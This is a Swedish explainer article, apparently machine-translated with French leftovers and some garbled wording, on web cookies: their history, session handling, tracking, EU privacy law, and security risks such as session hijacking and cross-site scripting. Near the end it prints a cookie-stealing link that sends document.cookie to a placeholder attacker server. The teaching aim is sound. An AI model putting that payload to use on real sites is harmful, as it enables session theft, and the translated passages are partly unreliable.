in ,

Internetkaka: Vad Àr det? Definition, ursprung, typer och integritet

Vilken roll har en kaka, vad Ă€r den och vilka typer av kakor finns det? đŸȘ

Internetkaka: Vad Àr det? Definition, ursprung, typer och integritet
Internetkaka: Vad Àr det? Definition, ursprung, typer och integritet

Un cookie eller webbcookie (Eller kaka, förkortat som vittne i Quebec) definieras av HTTP-kommunikationsprotokollet som en sekvens av information som skickas av en HTTP-server till en HTTP-klient, som den senare returnerar varje gÄng samma HTTP-server frÄgas under vissa förhÄllanden.

Cookien motsvarar en liten textfil lagrad pÄ terminalen av internetanvÀndaren. De har funnits i mer Àn 20 Är och tillÄter webbutvecklare att lagra anvÀndardata för att underlÀtta deras navigering och tillÄta vissa funktioner. Cookies har alltid varit mer eller mindre kontroversiella eftersom de innehÄller ÄterstÄende personlig information som potentiellt kan utnyttjas av tredje part.

Den skickas som en HTTP-header av webbservern till webblÀsaren som returnerar den oförÀndrad varje gÄng den gÄr in pÄ servern. En kaka kan anvÀndas för att en autentisering, en session (statligt underhÄll), och för lagra specifik information om anvÀndaren, till exempel webbplatspreferenser eller innehÄllet i en elektronisk kundvagn. Termen cookie kommer frÄn magisk kaka, ett vÀlkÀnt koncept inom UNIX-datorer, som inspirerade idén och namnet pÄ webblÀsarcookies. Det finns nÄgra fÄ alternativ till cookies, var och en med sina egna anvÀndningsomrÄden, fördelar och nackdelar.

Eftersom cookies Ă€r enkla textfiler Ă€r de inte körbara. De Ă€r inte varken spionprogram eller virus, Ă€ven om cookies frĂ„n vissa webbplatser upptĂ€cks av mĂ„nga antivirusprogram eftersom de tillĂ„ter anvĂ€ndare att spĂ„ras nĂ€r de besöker flera webbplatser. 

De flesta moderna webblÀsare tillÄter anvÀndare att bestÀmma om du vill acceptera eller avvisa cookies. AnvÀndare kan ocksÄ vÀlja hur lÀnge cookies lagras. Det totala avslaget pÄ cookies gör dock vissa webbplatser oanvÀndbara. Till exempel, lagra kundvagnar eller webbplatser som krÀver inloggning med hjÀlp av referenser (anvÀndarnamn och lösenord).

InnehÄllsförteckning

Historique

termen kaka kommer frÄn den engelska termen magisk kaka, vilket Àr ett datapaket som ett program tar emot och returnerar oförÀndrat. Cookies anvÀndes redan i IT nÀr Lou Montulli hade idén att anvÀnda dem i webbkommunikation i juni 1994. DÄ var han anstÀlld av Netscape Communications som hade utvecklat en e-handelsapplikation för en kund. Cookies gav en lösning pÄ problemet med tillförlitligheten hos en butiks virtuella kundvagnsimplementering.

John Giannandrea och Lou Montulli skrev Netscapes första cookiespecifikation samma Är. Version 0.9 beta av Mosaic Netscape, slÀppt den 13 oktober 1994, integrerad cookie-teknik (se inlÀgg). Den första (icke-experimentella) anvÀndningen av cookies var att avgöra om besökare pÄ Netscapes webbplats hade besökt webbplatsen tidigare. Montulli lÀmnade in en patentansökan för cookie-teknologi 1995, och USA-patentet 5774670 XNUMX XNUMX beviljades. beviljades 1998.

Efter att ha implementerats i Netscape 0.9 beta 1994, integrerades cookies i Internet Explorer 2, som slÀpptes i oktober 1995.

Införandet av cookies har Ă€nnu inte varit allmĂ€nt kĂ€nt för allmĂ€nheten. I synnerhet accepterades cookies som standard i webblĂ€sarinstĂ€llningarna och anvĂ€ndarna informerades inte om deras nĂ€rvaro. Vissa mĂ€nniskor var medvetna om förekomsten av cookies runt första kvartalet 1995, men allmĂ€nheten tog till sig deras existens först efter att Financial Times publicerade en artikel den 12 februari 1996. Samma Ă„r fick cookies stor uppmĂ€rksamhet i media pĂ„ grund av eventuella integritetsintrĂ„ng. Ämnet för cookies diskuterades i tvĂ„ samrĂ„d med American Federal Trade Commission 1996 och 1997.

Utvecklingen av den officiella cookiespecifikationen var redan igÄng. De första diskussionerna om den officiella specifikationen Àgde rum i april 1995 pÄ e-postlistan www-talk. En sÀrskild IETF-arbetsgrupp bildades. TvÄ alternativa förslag för att införa statliga till HTTP-transaktioner föreslogs av Brian Behlendorf respektive David Kristol, men gruppen, ledd av Kristol sjÀlv, bestÀmde sig för att anvÀnda Netscapes specifikation som utgÄngspunkt. I februari 1996 faststÀllde arbetsgruppen att tredjepartscookies var ett betydande hot mot integriteten. Specifikationen som tagits fram av gruppen publicerades sÄ smÄningom som RFC 2109.

FrÄn slutet av 2014 ser vi en banner om cookies pÄ mÄnga sajter. Det finns minst ett webblÀsartillÀgg som tillÄter banner visas inte.

Typer av cookies och anvÀndningar

Sessionshantering

Cookies kan anvÀndas för att upprÀtthÄlla anvÀndardata under navigering, men Àven vid flera besök. Cookies introducerades för att tillhandahÄlla ett sÀtt att implementera elektroniska kundvagnar, en virtuell enhet dÀr anvÀndaren kan samla de varor han vill köpa medan han surfar pÄ webbplatsen.

Nuförtiden lagrar appar som kundvagnar istÀllet listan över föremÄl i en databas pÄ en server, vilket Àr att föredra; Àn att spara dem i sjÀlva kakan. Webbservern skickar en cookie som innehÄller ett unikt sessions-ID. WebblÀsaren returnerar sedan detta sessions-ID vid varje efterföljande begÀran och objekten i korgen sparas och associeras med samma unika sessions-ID.

Frekvent anvÀndning av cookies Àr anvÀndbart för att logga in pÄ en webbplats med hjÀlp av referenser. Kort sagt, webbservern skickar först en cookie som innehÄller ett unikt sessions-ID. Sedan anger anvÀndarna sina referenser (vanligtvis ett anvÀndarnamn och lösenord). Webbapplikationen autentiserar sedan sessionen och lÄter anvÀndaren komma Ät tjÀnsten.

personalisering

Cookies kan anvÀndas för att komma ihÄg information om anvÀndaren av en webbplats, för att visa honom lÀmpligt innehÄll i framtiden. Till exempel kan en webbserver skicka en cookie som innehÄller det senaste anvÀndarnamnet som anvÀndes för att logga in pÄ den webbplatsen, sÄ att anvÀndarnamnet kan fyllas i i förvÀg vid framtida besök.

MÄnga webbplatser anvÀnder cookies för personalisering baserat pÄ anvÀndarpreferenser. AnvÀndare vÀljer sina preferenser i ett formulÀr och skickar in dessa till servern. Servern kodar instÀllningarna i en cookie och skickar tillbaka den till webblÀsaren. DÀrefter, varje gÄng anvÀndaren gÄr in pÄ en sida pÄ denna webbplats, returnerar webblÀsaren cookien och dÀrmed listan med preferenser; servern kan sedan anpassa sidan enligt anvÀndarens preferenser. Till exempel tillÄter Wikipedias webbplats sina anvÀndare att vÀlja skalet pÄ webbplatsen de föredrar. Googles sökmotor lÄter sina anvÀndare (Àven om de inte Àr registrerade) vÀlja hur mÄnga resultat de vill se pÄ varje resultatsida.

SpÄrning

SpÄrningscookies anvÀnds för att spÄra internetanvÀndares surfvanor. Detta kan ocksÄ delvis göras genom att anvÀnda IP-adressen till datorn som gör en begÀran om en sida eller genom att anvÀnda HTTP-huvudet "referrer" som klienten skickar med varje begÀran, men cookies möjliggör större precision. Detta kan göras som i följande exempel:

  1. Om anvÀndaren ringer upp en sida pÄ en webbplats och begÀran inte innehÄller en cookie, antar servern att detta Àr den första sidan som anvÀndaren besöker. Servern skapar sedan en slumpmÀssig strÀng och skickar den till webblÀsaren tillsammans med den begÀrda sidan.
  2. FrÄn och med detta ögonblick kommer cookien automatiskt att skickas av webblÀsaren varje gÄng en ny sida pÄ webbplatsen anropas. Servern kommer att skicka sidan som vanligt, men kommer ocksÄ att logga webbadressen till den anropade sidan, datum, tidpunkt för begÀran och cookien i en loggfil.

Genom att titta pÄ loggfilen gÄr det sedan att se vilka sidor anvÀndaren har besökt och i vilken ordning. Till exempel, om filen innehÄller nÄgra förfrÄgningar gjorda med hjÀlp av id=abc-cookien, kan detta faststÀlla att alla dessa förfrÄgningar kommer frÄn samma anvÀndare. Den begÀrda webbadressen, datum och tid som Àr kopplade till förfrÄgningarna gör att anvÀndarens surfning kan spÄras.

Tredjepartscookies och webbbeacons, som förklaras nedan, möjliggör dessutom spĂ„rning över olika webbplatser. SpĂ„rning av en enda webbplats anvĂ€nds vanligtvis för statistiska Ă€ndamĂ„l. DĂ€remot anvĂ€nds spĂ„rning över olika webbplatser med hjĂ€lp av tredjepartscookies i allmĂ€nhet av reklamföretag för att skapa anonyma anvĂ€ndarprofiler (som sedan anvĂ€nds för att bestĂ€mma vilka annonser som ska visas för anvĂ€ndaren samt för att skicka honom e-postmeddelanden som motsvarar dessa annonser — SPAM ).

SpÄrningscookies Àr en risk för intrÄng i anvÀndarnas integritet men de kan enkelt raderas. De flesta moderna webblÀsare inkluderar ett alternativ för att automatiskt radera bestÀndiga cookies nÀr applikationen stÀngs.

Tredjepartscookies

Bilder och andra objekt som finns pÄ en webbsida kan finnas pÄ andra servrar Àn den som Àr vÀrd för sidan. För att visa sidan laddar webblÀsaren ner alla dessa objekt. De flesta webbplatser innehÄller information frÄn olika kÀllor. Om du till exempel skriver www.example.com i din webblÀsare, kommer det ofta att finnas objekt eller annonser pÄ en del av sidan som kommer frÄn olika kÀllor, det vill sÀga frÄn en annan domÀn Àn www. .example.com. "Förstapartscookies" Àr cookies som stÀlls in av den domÀn som anges i webblÀsarens adressfÀlt. Tredjepartscookies stÀlls in av ett av sidobjekten som kommer frÄn en annan domÀn.

Som standard accepterar webblÀsare som Mozilla Firefox, Microsoft Internet Explorer och Opera tredjepartscookies, men anvÀndare kan Àndra instÀllningarna i webblÀsaralternativen för att blockera dem. Det finns ingen sÀkerhetsrisk med tredjepartscookies som möjliggör webbfunktionalitet, men de anvÀnds ocksÄ för att spÄra anvÀndare. frÄn plats till plats.

Verktyg som Ghostery tillgÀngliga för alla webblÀsare inklusive Google Chrome kan blockera utbyten mellan tredje part.

Genomförande

En möjlig interaktion mellan en webblÀsare och servern som Àr vÀrd för webbsidan. Servern skickar en cookie till webblÀsaren och webblÀsaren skickar tillbaka den nÀr den anropar en annan sida.
En möjlig interaktion mellan en webblÀsare och servern som Àr vÀrd för webbsidan. Servern skickar en cookie till webblÀsaren och webblÀsaren skickar tillbaka den nÀr den anropar en annan sida.

Cookies Àr smÄ databitar som skickas av webbservern till webblÀsaren. WebblÀsaren returnerar dem oförÀndrade till servern och introducerar tillstÄnd (minne av tidigare hÀndelser) i den annars tillstÄndslösa HTTP-transaktionen. Utan cookies Àr varje hÀmtning av en webbsida eller en komponent av en webbsida en isolerad hÀndelse, oberoende av andra förfrÄgningar som görs till samma webbplats. Förutom att kunna stÀllas in av webbservern kan cookies Àven stÀllas in av skriptsprÄk som JavaScript, om webblÀsaren stöder och godkÀnner dem.

Den officiella cookiespecifikationen föreslÄr att webblÀsare ska kunna spara och skicka om ett minsta antal cookies. Specifikt bör en webblÀsare kunna lagra minst 300 cookies pÄ fyra kilobyte vardera och minst 20 cookies för en enda server eller domÀn.

Enligt avsnitt 3.1 i RFC 2965, cookienamn Àr skiftlÀgesokÀnsliga.

En cookie kan ange datumet för dess utgÄng, i vilket fall cookien kommer att raderas detta datum. Om cookien inte anger ett utgÄngsdatum, raderas cookien sÄ snart anvÀndaren lÀmnar sin webblÀsare. DÀrför Àr att ange ett utgÄngsdatum ett sÀtt att fÄ kakan att överleva genom flera sessioner. Av denna anledning sÀgs cookies med ett utgÄngsdatum vara ihÄllande. Ett exempel pÄ applikation: en ÄterförsÀljarwebbplats kan anvÀnda bestÀndiga cookies för att registrera de varor som anvÀndare har lagt i sin kundvagn (i verkligheten kan cookien referera till en post som sparats i en databas pÄ försÀljningsplatsen och inte pÄ din dator) . PÄ detta sÀtt, om anvÀndare lÀmnar sin webblÀsare utan att göra ett köp och ÄtervÀnder till den senare, kommer de att kunna hitta varorna i varukorgen igen. Om dessa cookies inte gav ett utgÄngsdatum, skulle de förfalla nÀr webblÀsaren stÀngdes, och informationen om innehÄllet i varukorgen skulle gÄ förlorad.

Cookies kan begrÀnsas i omfattning till en specifik domÀn, underdomÀn eller sökvÀg pÄ servern som skapade dem.

Överföringen av webbsidor görs med hjĂ€lp av HyperText Transfer Protocol (HTTP). Genom att ignorera cookies anropar webblĂ€sare en sida frĂ„n webbservrar genom att vanligtvis skicka en kort text som kallas HTTP-förfrĂ„gan. För att till exempel komma Ă„t sidan www.example.org/index.html ansluter webblĂ€sare till servern www.example.org och skickar en begĂ€ran som ser ut sĂ„ hĂ€r:

HĂ€mta /index.html HTTP/1.1 VĂ€rd: www.example.org
Navigateur→serveur

Servern svarar genom att skicka den begÀrda sidan, föregÄs av en liknande text, hela anropas HTTP-svar. Detta paket kan innehÄlla rader som instruerar webblÀsaren att lagra cookies:

HTTP/1.1 200 OKContent-type: text/htmlSet-Cookie: name=value
(HTML-sida)
Navigateur←serveur

Servern skickar bara Set-Cookie-raden om servern vill att webblÀsaren ska lagra en cookie. Set-Cookie Àr en begÀran för webblÀsaren att lagra namn=vÀrde-strÀngen och returnera den i alla framtida förfrÄgningar till servern. Om webblÀsaren stöder cookies och cookies Àr aktiverade i webblÀsaralternativen, kommer cookien att inkluderas i alla efterföljande förfrÄgningar som görs till samma server. Till exempel anropar webblÀsaren sidan www.example.org/news.html genom att skicka följande begÀran till servern www.example.org:

GET /news.html HTTP/1.1VÀrd: www.example.orgCookie: namn=vÀrdeAcceptera: */*
Navigateur→serveur

Detta Àr en begÀran om en annan sida frÄn samma server och skiljer sig frÄn den första ovan eftersom den innehÄller en strÀng som servern tidigare skickat till webblÀsaren. Tack vare detta sÀtt vet servern att denna begÀran Àr kopplad till den föregÄende. Servern svarar genom att skicka den anropade sidan, och Àven genom att lÀgga till andra cookies till den.

VÀrdet pÄ cookien kan Àndras av servern genom att skicka en ny rad Set-Cookie: name=new_value som svar pÄ den anropade sidan. WebblÀsaren ersÀtter sedan det gamla vÀrdet med det nya.

Set-Cookie-raden skapas vanligtvis av ett CGI-program eller annat skriptsprÄk, inte av HTTP-servern. HTTP-servern (exempel: Apache) kommer endast att överföra resultatet av programmet (ett dokument som föregÄs av rubriken som innehÄller cookies) till webblÀsaren.

Cookies kan ocksÄ stÀllas in av JavaScript eller andra liknande sprÄk som körs i webblÀsaren, det vill sÀga pÄ klientsidan snarare Àn serversidan. I JavaScript anvÀnds objektet document.cookie för detta ÀndamÄl. Till exempel skapar uttalandet document.cookie = "temperatur=20" en cookie med namnet "temperatur" och med vÀrdet 20.

Exempel pÄ ett HTTP-svar frÄn google.com, som stÀller in en cookie med attribut.
Exempel pÄ ett HTTP-svar frÄn google.com, som stÀller in en cookie med attribut.

Utöver namn/vÀrdeparet kan en cookie Àven innehÄlla ett utgÄngsdatum, en sökvÀg, ett domÀnnamn och vilken typ av anslutning som Àr avsedd, d.v.s. normal eller krypterad. RFC 2965 definierar ocksÄ att cookies mÄste ha ett obligatoriskt versionsnummer, men detta utelÀmnas i allmÀnhet. Dessa datadelar följer paret name=new_value och separeras med semikolon. Till exempel kan en cookie skapas av servern genom att skicka en Set-Cookie-rad: name=new_value; expires=date; sökvÀg=/; domÀn=.exempel.org.

Cookies upphör att gÀlla och skickas sedan inte av webblÀsaren till servern i följande situationer:

  • NĂ€r webblĂ€saren Ă€r stĂ€ngd, om cookien inte Ă€r bestĂ€ndig.
  • NĂ€r cookiens utgĂ„ngsdatum har passerat.
  • NĂ€r cookiens utgĂ„ngsdatum Ă€ndras (av servern eller skriptet) till ett datum i det förflutna.
  • NĂ€r webblĂ€saren tar bort cookien pĂ„ begĂ€ran av anvĂ€ndaren.

Den tredje situationen tillÄter servrar eller skript att explicit radera en cookie. Observera att det Àr möjligt med webblÀsaren Google Chrome att veta utgÄngsdatumet för en viss cookie genom att gÄ till innehÄllsinstÀllningarna. En cookie som sparas pÄ en dator kan mycket vÀl finnas kvar dÀr i flera decennier om ingen procedur vidtas för att radera den.

Stereotyper

Sedan deras introduktion pĂ„ Internet har mĂ„nga idĂ©er om cookies cirkulerat pĂ„ Internet och i media. År 1998 faststĂ€llde CIAC, ett team för övervakning av datorincidenter frĂ„n det amerikanska energidepartementet, att sĂ€kerhetssĂ„rbarheter för cookies var "i huvudsak obefintliga" och förklarade att "information om ursprunget till dina besök och detaljerna om de webbsidor du har besökt finns redan i loggfilerna pĂ„ webbservrarna”. År 2005 publicerade Jupiter Research resultaten av en studie, dĂ€r en betydande andel av de tillfrĂ„gade ansĂ„g följande pĂ„stĂ„enden:

  • Cookies Ă€r som virus, de infekterar anvĂ€ndarnas hĂ„rddiskar.
  • Cookies genererar pop-up.
  • Cookies anvĂ€nds för att skicka skrĂ€ppost.
  • Cookies anvĂ€nds endast för reklam.

Cookies kan inte radera eller lÀsa information frÄn anvÀndarens dator. Cookies gör det dock möjligt att upptÀcka de webbsidor som besöks av en anvÀndare pÄ en viss webbplats eller uppsÀttning webbplatser. Denna information kan samlas in i en anvÀndarprofil som kan anvÀndas eller sÀljas vidare till tredje part, vilket kan orsaka allvarliga integritetsproblem. Vissa profiler Àr anonyma, i den meningen att de inte innehÄller nÄgon personlig information, men Àven sÄdana profiler kan vara tveksamma.

Enligt samma studie vet en stor andel av internetanvÀndarna inte hur man tar bort cookies. En av anledningarna till att folk inte litar pÄ cookies Àr att vissa webbplatser har missbrukat den personligt identifierande aspekten av cookies och delat denna information med andra kÀllor. En stor andel av riktad reklam och oönskad e-post, som anses vara skrÀppost, kommer frÄn information frÄn spÄrningscookies.

WebblÀsarinstÀllningar

De flesta webblÀsare stöder cookies och tillÄter anvÀndaren att inaktivera dem. De vanligaste alternativen Àr:

  • Aktivera eller inaktivera cookies helt, sĂ„ att de stĂ€ndigt accepteras eller blockeras.
  • TillĂ„t anvĂ€ndaren att se de aktiva kakorna pĂ„ en given sida genom att ange javascript: alert(document.cookie) i webblĂ€sarens adressfĂ€lt. Vissa webblĂ€sare har en cookiehanterare för anvĂ€ndaren som kan se och selektivt radera cookies som för nĂ€rvarande lagras av webblĂ€saren.

De flesta webblÀsare tillÄter ocksÄ fullstÀndig radering av personuppgifter som inkluderar cookies. Ytterligare moduler för att kontrollera cookie-behörigheter finns ocksÄ.

Sekretess och tredjepartscookies

I detta fiktiva exempel har ett reklamföretag placerat banners pÄ tvÄ webbplatser. Genom att vara vÀrd för banners pÄ sina servrar och anvÀnda tredjepartscookies, kan reklamföretaget spÄra anvÀndarens navigering genom dessa tvÄ webbplatser.

Cookies har viktiga konsekvenser för webbanvĂ€ndarnas integritet och anonymitet. Även om cookies endast skickas tillbaka till servern som stĂ€ller in dem eller till en server som tillhör samma internetdomĂ€n, kan en webbsida dock innehĂ„lla bilder eller andra komponenter lagrade pĂ„ servrar som tillhör andra domĂ€ner. De cookies som stĂ€lls in under Ă„terstĂ€llningen av dessa externa komponenter kallas tredjepartscookies. Detta inkluderar cookies frĂ„n oönskade popup-fönster.

Annonsföretag anvÀnder tredjepartscookies för att spÄra anvÀndare pÄ de olika webbplatserna de besöker. I synnerhet kan ett reklamföretag spÄra en anvÀndare pÄ alla sidor dÀr det har placerat reklambilder eller en spÄrningspixel. Kunskap om de sidor som anvÀndaren besöker gör att reklamföretaget kan rikta in sig pÄ anvÀndarens reklampreferenser.

Möjligheten att bygga en anvÀndarprofil anses av vissa vara en integritetskrÀnkning, sÀrskilt nÀr spÄrning görs över olika domÀner med hjÀlp av tredjepartscookies. Av denna anledning har vissa lÀnder cookielagstiftning.

Förenta staternas regering införde strikta regler för placering av cookies Är 2000, efter att det avslöjades att Vita husets narkotikapolitiska kontor anvÀnde cookies för att spÄra datorer för anvÀndare som tittade pÄ narkotikareklam online. 2002 upptÀckte integritetsaktivisten Daniel Brandt att CIA lÀmnade bestÀndiga cookies pÄ datorer som hade besökt dess webbplatser. NÀr CIA vÀl informerades om detta intrÄng deklarerade de att dessa cookies inte skickades avsiktligt och upphörde att placera dem. Den 25 december 2005 upptÀckte Brandt att National Security Agency (NSA) hade lÀmnat tvÄ bestÀndiga cookies pÄ besökarnas datorer pÄ grund av en mjukvaruuppdatering. Efter att ha blivit underrÀttad inaktiverade NSA omedelbart cookies.

I Storbritannien, Cookielag ", som trÀdde i kraft den 25 maj 2012, ÄlÀgger sajterna att deklarera sina avsikter, vilket gör det möjligt för anvÀndarna att vÀlja om de vill lÀmna spÄr eller inte av sin passage pÄ Internet. De kan dÀrmed skyddas frÄn reklaminriktning. Dock, enligt The Guardian, InternetanvÀndares samtycke Àr inte nödvÀndigtvis explicit; Àndringar har gjorts i villkoren för anvÀndarens samtycke, vilket gör det alltsÄ underförstÄtt.

Direktiv 2002/58 om integritet

Direktiv 202/58 integritet och elektronisk kommunikation, innehÄller regler om anvÀndning av cookies. I synnerhet krÀver artikel 5, punkt 3 i detta direktiv att lagring av data (sÄsom cookies) i anvÀndarens dator endast kan göras om:

  • anvĂ€ndaren informeras om hur uppgifterna anvĂ€nds;
  • anvĂ€ndaren ges möjlighet att vĂ€gra denna lagringsoperation. Men i denna artikel anges ocksĂ„ att lagring av uppgifter av tekniska skĂ€l Ă€r undantagen frĂ„n denna lag.

Direktivet, som skulle implementeras frÄn oktober 2003, genomfördes dock endast mycket ofullstÀndigt i praktiken enligt en rapport frÄn december 2004, som ocksÄ pÄpekade att vissa medlemsstater (Slovakien, Lettland, Grekland, Belgien och Luxemburg) Ànnu inte hade införlivat direktiv i nationell lagstiftning.

Enligt Äsikten frÄn G29 2010, tillÀmpas detta direktiv, som framför allt villkorar anvÀndningen av cookies för beteendebaserad reklam, med uttryckligt samtycke frÄn internetanvÀndaren, mycket dÄligt. Faktum Àr att de flesta sajter gör det pÄ ett sÀtt som inte följer direktivet, genom att begrÀnsa sig till en enkel "banner" som informerar om anvÀndningen av "cookies" utan att ge information om anvÀndningen, utan att skilja mellan "tekniska" cookies. "spÄrnings"-cookies, inte heller för att erbjuda ett verkligt val till anvÀndaren som vill behÄlla tekniska cookies (sÄsom kundvagnshanteringscookies) och vÀgra "spÄrnings"-cookies. Faktum Àr att mÄnga webbplatser inte fungerar korrekt om cookies vÀgras, vilket inte överensstÀmmer med direktiv 2002/58 eller direktiv 95/46 (Skydd av personuppgifter).

Direktiv 2009 / 136 / CE

Detta material har uppdaterats genom direktiv 2009/136/EG daterat den 25 november 2009 som sĂ€ger att "lagring av information, eller att fĂ„ tillgĂ„ng till information som redan finns lagrad, i en abonnents eller anvĂ€ndares terminalutrustning Ă€r endast tillĂ„ten under förutsĂ€ttning att abonnenten eller anvĂ€ndaren har gett sitt samtycke, efter att ha mottagit, i enlighet med direktiv 95/46/EG, tydlig och fullstĂ€ndig information mellan andra om syftet med behandlingen”. Det nya direktivet stĂ€rker dĂ€rför skyldigheterna inför placering av cookies pĂ„ internetanvĂ€ndarens dator.

I de preliminĂ€ra övervĂ€gandena av direktivet specificerar den europeiska lagstiftaren dock: "DĂ€r det Ă€r tekniskt möjligt och effektivt, i enlighet med relevanta bestĂ€mmelser i direktiv 95/46/EG, fĂ„r anvĂ€ndarens samtycke med avseende pĂ„ behandlingen uttryckas genom anvĂ€ndning av lĂ€mpliga instĂ€llningar för en webblĂ€sare eller annan applikation”. Men faktiskt, ingen webblĂ€sare hittills gör det möjligt att skilja de vĂ€sentliga tekniska cookies frĂ„n de valfria som bör överlĂ„tas till anvĂ€ndarens val.

Detta nya direktiv införlivades av belgiska parlamentsledamöter i juli 2012. En studie frÄn 2014 visar att Àven parlamentsledamöter kÀmpar för att ansöka direktivets begrÀnsningar.

P3P

P3P-specifikationen inkluderar möjligheten för en server att ange en integritetspolicy, som definierar vilken typ av information den samlar in och för vilket ÀndamÄl. Dessa policyer inkluderar (men Àr inte begrÀnsade till) anvÀndningen av information som samlas in med hjÀlp av cookies. Enligt definitionerna av P3P kan en webblÀsare acceptera eller avvisa cookies genom att jÀmföra integritetspolicyn med anvÀndarens preferenser eller genom att frÄga anvÀndaren och presentera integritetspolicyn som deklarerats av servern.

MÄnga webblÀsare, inklusive Apple Safari och Microsoft Internet Explorer version 6 och 7, stöder P3P som gör att webblÀsaren kan avgöra om den ska acceptera tredjepartslagring av cookies. Opera-webblÀsaren tillÄter anvÀndare att vÀgra cookies frÄn tredje part och att skapa en global och specifik sÀkerhetsprofil för internetdomÀner. Mozilla Firefox version 2 tappade P3P-stöd men ÄterstÀllde det i version 3.

Tredjepartscookies kan blockeras av de flesta webblÀsare för att öka integriteten och minska annonsspÄrningen, utan att negativt pÄverka anvÀndarens webbupplevelse. MÄnga reklambyrÄer erbjuder ett alternativ vÀlja bort till riktad reklam, genom att sÀtta upp en generisk cookie i webblÀsaren som inaktiverar denna inriktning, men en sÄdan lösning Àr inte praktiskt effektiv, nÀr den respekteras, eftersom denna generiska cookie raderas sÄ snart anvÀndaren tar bort dessa cookies vilket avbryter valet ut beslut.

Nackdelar med cookies

Förutom integritetsproblem har cookies Àven vissa tekniska nackdelar. I synnerhet identifierar de inte alltid anvÀndare korrekt, de kan bromsa webbplatsens prestanda i stort antal, de kan anvÀndas för sÀkerhetsattacker och de kommer i konflikt med den representativa tillstÄndsöverföringen, arkitektoniska stilen för programvaran.

Oprecis identifiering

Om mer Àn en webblÀsare anvÀnds pÄ en dator, finns det i var och en av dem alltid en separat lagringsenhet för cookies. Cookies identifierar dÀrför inte en person, utan kombinationen av ett anvÀndarkonto, en dator och en webblÀsare. SÄledes kan vem som helst anvÀnda dessa konton, datorer eller webblÀsare som har en mÀngd cookies. PÄ samma sÀtt gör cookies ingen skillnad mellan flera anvÀndare som delar samma anvÀndarkonto, dator och webblÀsare, till exempel pÄ "internetkaféer" eller nÄgon annan plats som ger fri tillgÄng till datorresurser.

Men i praktiken visar sig detta uttalande vara felaktigt i de flesta fall eftersom idag en "personlig" dator (eller en smartphone eller surfplatta, vilket Àr vÀrre) huvudsakligen anvÀnds av en enskild individ. Detta innebÀr att rikta in sig pÄ en specifik person och genom mÀngden information som samlas in, komma fram till personlig inriktning Àven om personen inte Àr "nÀmligen" identifierad.

En cookie kan stjÀlas av en annan dator i nÀtverket.

Under normal drift skickas cookies tillbaka mellan servern (eller en grupp servrar i samma domÀn) och anvÀndarens datorwebblÀsare. Eftersom cookies kan innehÄlla kÀnslig information (anvÀndarnamn, ett lösenord som anvÀnds för autentisering, etc.), bör deras vÀrden inte vara tillgÀngliga för andra datorer. Cookiestöld Àr en handling dÀr en obehörig tredje part avlyssnar cookies.

Cookies kan stjÀlas via en paketsniffer i en attack som kallas sessionskapning. Trafik pÄ nÀtet kan fÄngas upp och lÀsas av andra datorer Àn de som sÀnder och tar emot (sÀrskilt pÄ det okrypterade offentliga Wi-Fi-utrymmet). Denna trafik inkluderar cookies som skickas över sessioner med det vanliga HTTP-protokollet. NÀr nÀtverkstrafiken inte Àr krypterad kan illvilliga anvÀndare alltsÄ lÀsa kommunikationen frÄn andra anvÀndare pÄ nÀtverket med hjÀlp av "paketsniffer".

Detta problem kan lösas genom att kryptera anslutningen mellan anvÀndarens dator och servern med hjÀlp av HTTPS-protokollet. En server kan ange en sÀker flagga medan du stÀller in en cookie; webblÀsaren skickar det bara över en sÀker linje, till exempel en SSL-anslutning.

Men mÄnga webbplatser, Àven om de anvÀnder HTTPS-krypterad kommunikation för anvÀndarautentisering (dvs. inloggningssidan), skickar senare sessionscookies och annan data som vanligt, genom okrypterade HTTP-anslutningar av effektivitetsskÀl. Angripare kan alltsÄ fÄnga upp andra anvÀndares cookies och utge sig för att vara dem pÄ lÀmpliga webbplatser eller anvÀnda dem i cookie-attacker.

Skriptning pÄ webbplatsen: en cookie som endast ska utbytas mellan servern och klienten skickas till en annan tredje part.

Ett annat sÀtt att stjÀla cookies Àr att skripta webbplatser och lÄta webblÀsaren sjÀlv skicka cookies till skadliga servrar som aldrig tar emot dem. Moderna webblÀsare tillÄter exekvering av eftertraktade delar av koden frÄn servern. Om cookies nÄs under körning, kan deras vÀrden kommuniceras i nÄgon form till servrar som inte bör komma Ät dem. Att kryptera cookies innan de skickas över nÀtverket hjÀlper inte till att förhindra attacken.

Denna typ av in-site scripting anvÀnds vanligtvis av angripare pÄ webbplatser som tillÄter anvÀndare att lÀgga upp HTML-innehÄll. Genom att integrera en del av kompatibel kod i HTML-bidraget kan en angripare ta emot cookies frÄn andra anvÀndare. Kunskap om dessa cookies kan anvÀndas genom att ansluta till samma webbplats med hjÀlp av de stulna cookies, och dÀrmed identifieras som anvÀndaren vars cookies stals.

Ett sÀtt att förhindra sÄdana attacker Àr att anvÀnda flaggan HttpOnly; det Àr ett alternativ, introducerat sedan version 6 av Internet Explorer i PHP sedan version 5.2.0 som Àr planerat att göra cookien oÄtkomlig för klienten nÀra skriptet. DÀremot bör webbutvecklare ta hÀnsyn till detta i sin webbplatsutveckling sÄ att de Àr immuna mot skript pÄ webbplatsen.

Ett annat sÀkerhetshot som anvÀnds Àr efterfrÄgetillverkning pÄ sajten.

Den officiella tekniska specifikationen tillÄter att cookies skickas tillbaka endast till servrar pÄ den domÀn de kommer frÄn. VÀrdet av cookies kan dock skickas till andra servrar med andra medel Àn cookie-rubriker.

I synnerhet tillÄts skriptsprÄk som JavaScript i allmÀnhet att komma Ät cookie-vÀrden och kan skicka godtyckliga vÀrden till vilken server som helst pÄ Internet. Denna skriptfunktion anvÀnds frÄn webbplatser som tillÄter anvÀndare att lÀgga upp HTML-innehÄll för andra anvÀndare att se.

Till exempel kan en angripare som verkar pÄ domÀnen example.com posta en kommentar som innehÄller följande lÀnk som pekar pÄ en populÀr blogg som de annars inte kontrollerar:

<a href="#" onclick="window.location = 'http://exemple.com/stole.cgi?text=' + escape(document.cookie); return false;">Cliquez ici !</a>

NÀr en annan anvÀndare klickar pÄ den hÀr lÀnken, kör webblÀsaren onclick-attributdelen av koden, sÄ den ersÀtter strÀngen document.cookie med listan över anvÀndarcookies som Àr aktiva för den hÀr sidan. DÀrför skickas denna lista med cookies till exempel.com-servern, och angriparen kan dÀrför samla in denna anvÀndares cookies.

Denna typ av attack Àr svÄr att upptÀcka pÄ anvÀndarsidan eftersom skriptet kommer frÄn samma domÀn som satte cookien, och operationen för att skicka vÀrdena verkar vara auktoriserad av den domÀnen. Det anses att det Àr de administratörer som driver denna typ av webbplatser som ansvarar för att införa begrÀnsningar som förhindrar publicering av skadlig kod.

